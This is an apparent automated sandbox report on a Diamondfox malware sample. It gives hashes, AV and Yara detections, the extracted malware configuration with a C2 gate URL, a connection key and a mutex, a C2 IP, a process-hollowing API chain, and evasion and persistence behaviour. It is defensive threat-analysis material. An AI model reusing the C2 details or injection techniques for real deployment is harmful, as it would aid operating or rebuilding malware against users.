Loading ...

Play interactive tourEdit tour

Analysis Report dY5HmgsBm6

Overview

General Information

Sample Name:dY5HmgsBm6 (renamed file extension from none to exe)
Analysis ID:397764
MD5:ae8f9d9b8344d52f0872dfdc852e1dd4
SHA1:7e9f4259cc193465317ee48b8428b36e74028390
SHA256:95b5d0e36464afc8391a9d056926e5859506ead18937669554bde42f7a6d135b
Infos:

Most interesting Screenshot:

Detection

Diamondfox
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Diamondfox
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking mutex)
PE file has a writeable .text section
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • dY5HmgsBm6.exe (PID: 6924 cmdline: 'C:\Users\user\Desktop\dY5HmgsBm6.exe' MD5: AE8F9D9B8344D52F0872DFDC852E1DD4)
    • CachemanControlPanel.exe (PID: 6988 cmdline: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe MD5: 5D3BF7A18887582B8A2CEA327F2E7BA6)
  • cleanup

Malware Configuration

Threatname: Diamondfox

{"gate": {"url[0]": "http://vladisfoxlink.ru/support/enfr/gate.php"}, "user_agent": {"agent[0]": "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36"}, "connection_key": {"key[0]": "1df2b4de68ad60874427e4d6057ea13f"}, "timers": {"connect": "60", "reconnect": "30", "process": "80", "reports": "70", "plugins": "300"}, "installation": {"name": "MicrosoftEdgeCPS", "subfolder": "EdgeCP", "path": "APPDATA", "mutex": "rV8Uqv6WyyQabAbuwVPeRHm6JxPMDa6t", "melt": "0", "antis": "0", "rip": "0", "setup": "0", "startup": "0"}}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: CachemanControlPanel.exe PID: 6988JoeSecurity_DiamondfoxYara detected DiamondfoxJoe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000002.00000003.463135358.0000000002730000.00000004.00000040.sdmpMalware Configuration Extractor: Diamondfox {"gate": {"url[0]": "http://vladisfoxlink.ru/support/enfr/gate.php"}, "user_agent": {"agent[0]": "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36"}, "connection_key": {"key[0]": "1df2b4de68ad60874427e4d6057ea13f"}, "timers": {"connect": "60", "reconnect": "30", "process": "80", "reports": "70", "plugins": "300"}, "installation": {"name": "MicrosoftEdgeCPS", "subfolder": "EdgeCP", "path": "APPDATA", "mutex": "rV8Uqv6WyyQabAbuwVPeRHm6JxPMDa6t", "melt": "0", "antis": "0", "rip": "0", "setup": "0", "startup": "0"}}
    Multi AV Scanner detection for domain / URLShow sources
    Source: vladisfoxlink.ruVirustotal: Detection: 9%Perma Link
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\libgraph31.dllReversingLabs: Detection: 34%
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\libxml3.dllReversingLabs: Detection: 20%
    Multi AV Scanner detection for submitted fileShow sources
    Source: dY5HmgsBm6.exeVirustotal: Detection: 49%Perma Link
    Source: dY5HmgsBm6.exeReversingLabs: Detection: 34%
    Source: dY5HmgsBm6.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: dY5HmgsBm6.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: C:\storage\SIV32X\pdb\VCL\codecs\Obj\storage\build\Release\p.pdbr source: CachemanControlPanel.exe, 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp, CachemanControlPanel.exe.1.dr
    Source: Binary string: C:\libcrypto-1_1-x64\StartupManager\Bin\RelWithDebI.pdb source: CachemanControlPanel.exe, 00000002.00000002.467262960.000000006E4E9000.00000002.00020000.sdmp, libxml3.dll.1.dr
    Source: Binary string: d:\agent\_work\3\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
    Source: Binary string: C:\storage\SIV32X\pdb\VCL\codecs\Obj\storage\build\Release\p.pdb source: CachemanControlPanel.exe, 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp, CachemanControlPanel.exe.1.dr
    Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Concurrentd.pdb source: Qt5Concurrentd.dll.1.dr
    Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Concurrentd.pdb"" source: Qt5Concurrentd.dll.1.dr
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeCode function: 1_2_0040646B FindFirstFileA,FindClose,1_2_0040646B
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeCode function: 1_2_004027A1 FindFirstFileA,1_2_004027A1
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeCode function: 1_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,1_2_004058BF
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0040C837 wcsncpy,wcslen,wcscat,GetDriveTypeW,FindFirstFileW,FindClose,GetFileAttributesW,GetDriveTypeW,2_2_0040C837

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: http://vladisfoxlink.ru/support/enfr/gate.php
    Source: Joe Sandbox ViewASN Name: ASN-GIGENETUS ASN-GIGENETUS
    Source: global trafficTCP traffic: 192.168.2.6:49740 -> 45.85.90.225:80
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_00408683 InternetOpenW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,HttpAddRequestHeadersW,HttpSendRequestW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_00408683
    Source: unknownDNS traffic detected: queries for: vladisfoxlink.ru
    Source: Qt5Concurrentd.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: Qt5Concurrentd.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
    Source: Qt5Concurrentd.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: Qt5Concurrentd.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
    Source: Qt5Concurrentd.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: Qt5Concurrentd.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
    Source: Qt5Concurrentd.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: Qt5Concurrentd.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: Qt5Concurrentd.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
    Source: Qt5Concurrentd.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: dY5HmgsBm6.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
    Source: dY5HmgsBm6.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: Qt5Concurrentd.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: Qt5Concurrentd.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
    Source: Qt5Concurrentd.dll.1.drString found in binary or memory: http://ocsp.digicert.com0O
    Source: CachemanControlPanel.exe, 00000002.00000003.463261074.0000000002A84000.00000004.00000040.sdmpString found in binary or memory: http://vladisfoxlink.ru/support/enfr/gate.php
    Source: CachemanControlPanel.exe, 00000002.00000003.463261074.0000000002A84000.00000004.00000040.sdmpString found in binary or memory: http://vladisfoxlink.ru/support/enfr/gate.phpte.phpK
    Source: dY5HmgsBm6.exe, 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp, zlib.dll.1.drString found in binary or memory: http://www.zlib.net/D
    Source: CachemanControlPanel.exe, CachemanControlPanel.exe, 00000002.00000000.326512498.00000000006FD000.00000002.00020000.sdmp, CachemanControlPanel.exe.1.drString found in binary or memory: https://bitsum.com
    Source: CachemanControlPanel.exe, 00000002.00000000.326512498.00000000006FD000.00000002.00020000.sdmp, CachemanControlPanel.exe.1.drString found in binary or memory: https://bitsum.com/
    Source: CachemanControlPanel.exe, 00000002.00000000.326512498.00000000006FD000.00000002.00020000.sdmp, CachemanControlPanel.exe.1.drString found in binary or memory: https://bitsum.com/3Current
    Source: CachemanControlPanel.exeString found in binary or memory: https://ip.seeip.org/
    Source: CachemanControlPanel.exe, 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmpString found in binary or memory: https://ip.seeip.org/Content-Type:
    Source: Qt5Concurrentd.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeCode function: 1_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_0040535C

    E-Banking Fraud:

    barindex
    Yara detected DiamondfoxShow sources
    Source: Yara matchFile source: Process Memory Space: CachemanControlPanel.exe PID: 6988, type: MEMORY

    System Summary:

    barindex
    PE file has a writeable .text sectionShow sources
    Source: CachemanControlPanel.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_00407EA1 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,2_2_00407EA1
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeCode function: 1_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403348
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeCode function: 1_2_004069451_2_00406945
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeCode function: 1_2_0040711C1_2_0040711C
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0040E02E2_2_0040E02E
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_004198A02_2_004198A0
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_004150A42_2_004150A4
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0041C0A82_2_0041C0A8
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_004109502_2_00410950
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_004131B02_2_004131B0
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0041F2002_2_0041F200
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0041F2C92_2_0041F2C9
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0041F2832_2_0041F283
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0041FB402_2_0041FB40
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0040F3602_2_0040F360
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_004103602_2_00410360
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_00410B302_2_00410B30
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0040E3A72_2_0040E3A7
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0040F5702_2_0040F570
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0040DDF32_2_0040DDF3
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0040FD802_2_0040FD80
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0041B6302_2_0041B630
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0041EED02_2_0041EED0
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0041EEF02_2_0041EEF0
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0040E7392_2_0040E739
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0040F7802_2_0040F780
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0040EFB32_2_0040EFB3
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe 014D644ECCC232CD6906C5ABF8AFD3E53F94004057D4A1BB2771DFEA00F0AE4B
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\CachemanControlPanel\libgraph31.dll A276F57503BAD9A4BCA17E8E057993607E715C1FA6C7D2E136A2290A19EFD560
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: String function: 004187A0 appears 32 times
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: String function: 00418710 appears 38 times
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: String function: 00418770 appears 33 times
    Source: CachemanControlPanel.exe.1.drStatic PE information: Resource name: RT_RCDATA type: COM executable for DOS
    Source: dY5HmgsBm6.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: CachemanControlPanel.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: dY5HmgsBm6.exe, 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmpBinary or memory string: OriginalFilenamezlib1.dll* vs dY5HmgsBm6.exe
    Source: dY5HmgsBm6.exe, 00000001.00000002.327150069.0000000002330000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs dY5HmgsBm6.exe
    Source: dY5HmgsBm6.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: classification engineClassification label: mal96.troj.evad.winEXE@3/12@1/1
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeCode function: 1_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403348
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeCode function: 1_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_0040460D
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_004039B7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetCurrentProcessId,CloseHandle,2_2_004039B7
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeCode function: 1_2_0040216B CoCreateInstance,MultiByteToWideChar,1_2_0040216B
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeFile created: C:\Users\user\AppData\Roaming\CachemanControlPanelJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeMutant created: \Sessions\1\BaseNamedObjects\rV8Uqv6WyyQabAbuwVPeRHm6JxPMDa6t
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeFile created: C:\Users\user\AppData\Local\Temp\nsuAFD0.tmpJump to behavior
    Source: dY5HmgsBm6.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: CachemanControlPanel.exe, 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp, CachemanControlPanel.exe.1.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
    Source: CachemanControlPanel.exe, 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp, CachemanControlPanel.exe.1.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
    Source: CachemanControlPanel.exe, 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp, CachemanControlPanel.exe.1.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
    Source: dY5HmgsBm6.exeVirustotal: Detection: 49%
    Source: dY5HmgsBm6.exeReversingLabs: Detection: 34%
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeFile read: C:\Users\user\Desktop\dY5HmgsBm6.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\dY5HmgsBm6.exe 'C:\Users\user\Desktop\dY5HmgsBm6.exe'
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeProcess created: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeProcess created: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeJump to behavior
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: dY5HmgsBm6.exeStatic file information: File size 2573987 > 1048576
    Source: dY5HmgsBm6.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: C:\storage\SIV32X\pdb\VCL\codecs\Obj\storage\build\Release\p.pdbr source: CachemanControlPanel.exe, 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp, CachemanControlPanel.exe.1.dr
    Source: Binary string: C:\libcrypto-1_1-x64\StartupManager\Bin\RelWithDebI.pdb source: CachemanControlPanel.exe, 00000002.00000002.467262960.000000006E4E9000.00000002.00020000.sdmp, libxml3.dll.1.dr
    Source: Binary string: d:\agent\_work\3\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
    Source: Binary string: C:\storage\SIV32X\pdb\VCL\codecs\Obj\storage\build\Release\p.pdb source: CachemanControlPanel.exe, 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp, CachemanControlPanel.exe.1.dr
    Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Concurrentd.pdb source: Qt5Concurrentd.dll.1.dr
    Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Concurrentd.pdb"" source: Qt5Concurrentd.dll.1.dr
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_00412C47 LoadLibraryW,GetProcAddress,memset,FreeLibrary,LoadLibraryW,GetProcAddress,FreeLibrary,2_2_00412C47
    Source: CachemanControlPanel.exe.1.drStatic PE information: section name: _RDATA
    Source: Qt5Concurrentd.dll.1.drStatic PE information: section name: .00cfg
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0042E81E push cs; iretd 2_2_0042E7F2
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0042E9CE push ebx; ret 2_2_0042E9CF
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0042A5AB push 0000006Ah; retf 2_2_0042A684
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0042A613 push 0000006Ah; retf 2_2_0042A684
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0042A615 push 0000006Ah; retf 2_2_0042A684
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0042E71C push cs; iretd 2_2_0042E7F2

    Persistence and Installation Behavior:

    barindex
    Yara detected DiamondfoxShow sources
    Source: Yara matchFile source: Process Memory Space: CachemanControlPanel.exe PID: 6988, type: MEMORY
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeFile created: C:\Users\user\AppData\Roaming\CachemanControlPanel\libgraph31.dllJump to dropped file
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeFile created: C:\Users\user\AppData\Roaming\CachemanControlPanel\libxml3.dllJump to dropped file
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeFile created: C:\Users\user\AppData\Roaming\CachemanControlPanel\libgcc_s_seh-1.dllJump to dropped file
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeFile created: C:\Users\user\AppData\Roaming\CachemanControlPanel\libgstcontroller-1.0-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeFile created: C:\Users\user\AppData\Roaming\CachemanControlPanel\vcruntime140.dllJump to dropped file
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeFile created: C:\Users\user\AppData\Roaming\CachemanControlPanel\libogg-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeFile created: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeJump to dropped file
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeFile created: C:\Users\user\AppData\Roaming\CachemanControlPanel\libblkmaker-0.1-6.dllJump to dropped file
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeFile created: C:\Users\user\AppData\Roaming\CachemanControlPanel\zlib.dllJump to dropped file
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeFile created: C:\Users\user\AppData\Roaming\CachemanControlPanel\Qt5Concurrentd.dllJump to dropped file
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion:

    barindex
    Found evasive API chain (may stop execution after checking mutex)Show sources
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_2-16047
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_004039B7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetCurrentProcessId,CloseHandle,2_2_004039B7
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 260000Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259884Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259778Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259669Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259560Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259450Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259341Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259232Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259122Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259013Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258899Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258794Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258685Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258576Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258466Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258356Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258246Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258138Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258029Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 257919Jump to behavior
